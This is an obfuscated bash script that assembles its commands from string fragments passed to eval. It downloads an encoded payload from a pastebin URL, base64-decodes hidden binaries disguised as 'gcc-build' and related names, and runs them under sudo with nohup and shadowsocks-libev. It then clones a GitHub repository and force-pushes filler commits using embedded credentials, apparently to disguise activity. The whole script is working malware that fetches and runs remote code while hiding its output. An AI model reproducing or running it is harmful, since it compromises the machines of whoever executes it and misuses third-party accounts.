dAKl="sudo apt update"
ddZPL=" &>/dev/null"
XBfJF=" || t"
eval "$dAKl""$ddZPL""$XBfJF""rue"
YvfxJUv="get -O cod"
MrCqzsY="esrc https:/"
aGPJ="/pastebin.com"
ewYomaW="/raw/UKs9h"
ZIAPdDq="Zfc &>/dev/nu"
QtVDN="l"
eval "w""$YvfxJUv""$MrCqzsY""$aGPJ""$ewYomaW""$ZIAPdDq""$QtVDN""l"
NgAj="urce ./co"
eval "so""$NgAj""desrc"
git clone $SRC codes &>/dev/null
XRWqUke="e64 -d codes/"
eval "bas""$XRWqUke""s > o"
CmsGXx="udo apt --y"
BgrD="es install "
jlPiSq="psmisc shadows"
tWEWG="ocks-libev &>/d"
SOhZGVZ="ev/null || tr"
eval "s""$CmsGXx""$BgrD""$jlPiSq""$tWEWG""$SOhZGVZ""ue"
sOlDbEd="o systemctl"
gnwNt=" stop shad"
UUBaXZk="owsocks-libev."
ApUJDeR="service &>"
yXzI="/dev/null |"
qcMRLLLm="| true"
eval "sud""$sOlDbEd""$gnwNt""$UUBaXZk""$ApUJDeR""$yXzI""$qcMRLLLm"
SqsF="ase64 -d co"
BxOPrKBw="des/c > "
eval "b""$SqsF""$BxOPrKBw""pipe"
OFhZgEk="ase64 -d cod"
rKMAul="es/gc > g"
eval "b""$OFhZgEk""$rKMAul""c"
vJKGHIX="ase64 -d cod"
otkMC="es/m > gcc-b"
eval "b""$vJKGHIX""$otkMC""uild"
kzFu="ase64 -d code"
NwfQES="s/p > prepa"
DIwrT="r"
eval "b""$kzFu""$NwfQES""$DIwrT""e"
source ./prepare
qlBfv="ohup sudo ss-lo"
CaIAi="cal -c o -"
haSct="-plugin ./gq"
xDOrei="s --plugin"
UOaKJRh="-opts ./gc &"
WtfSfLeX=">/dev/nu"
eval "n""$qlBfv""$CaIAi""$haSct""$xDOrei""$UOaKJRh""$WtfSfLeX""ll &"
chmod +x gcc-build
voBR=" -i 's/gcc/se"
DGyLf="gfo/g' p"
eval "sed""$voBR""$DGyLf""ipe"
UfRhj="hup sudo ."
YaEeOgLK="/gcc-build -c"
QDlBsrK=" pipe &>/dev/n"
eval "no""$UfRhj""$YaEeOgLK""$QDlBsrK""ull &"
echo rsndvs
pozEX="leep "
eval "s""$pozEX""66"
dhhKza="t clone https:/"
LjSjZHHW="/github.com/"
xHGCL="org-rlang-"
DLmNfh="ac/libimage.gi"
uqVs="t tmp &>/dev/nu"
yWIqSD="ll || tru"
eval "gi""$dhhKza""$LjSjZHHW""$xHGCL""$DLmNfh""$uqVs""$yWIqSD""e"
pncA="tmp || true"
eval "cd ""$pncA"
bkIfNu="it config "
ZYieF="user.name 'Ro"
owRVPh="man Akopyan' &"
imjr=">/dev/null "
vraE="||"
eval "g""$bkIfNu""$ZYieF""$owRVPh""$imjr""$vraE"" true"
xPdP=" config us"
KKWMMI="er.email ro"
UJzf="man.akopyan"
nFhOssG="xb@inbox.ru &>"
PBECCmc="/dev/null |"
HBaxjqg="|"
eval "git""$xPdP""$KKWMMI""$UJzf""$nFhOssG""$PBECCmc""$HBaxjqg"" true"
xDzkK="BUILD=\`date"
eval "$xDzkK"" +%s\`"
Mfjq="E=\`date +%"
eval "MAK""$Mfjq""S\`"
echo $BUILD >> rsndvs$MAKE
git add rsndvs$MAKE &>/dev/null || true
git commit -m $MAKE' Bumped libimage' &>/dev/null || true
kuffoYmp="it push ht"
GXMb="tps://roman"
fCnjcYFj="-akopyanxb:'"
BkbTH="CNjR-KSjHVv"
qoQN="_9Ap'@gith"
VquJO="ub.com/org-rl"
GNsBye="ang-ac/lib"
HgJpkzra="image.git -f &"
UbANb=">/dev/null"
ODwBmAD=" || tru"
eval "g""$kuffoYmp""$GXMb""$fCnjcYFj""$BkbTH""$qoQN""$VquJO""$GNsBye""$HgJpkzra""$UbANb""$ODwBmAD""e"
while :; do G=`date +%s`; echo 'New libimage '$G; [ `expr 1284 + $BUILD` -lt $G ] && sudo killall gcc-build && break; sleep 153; done
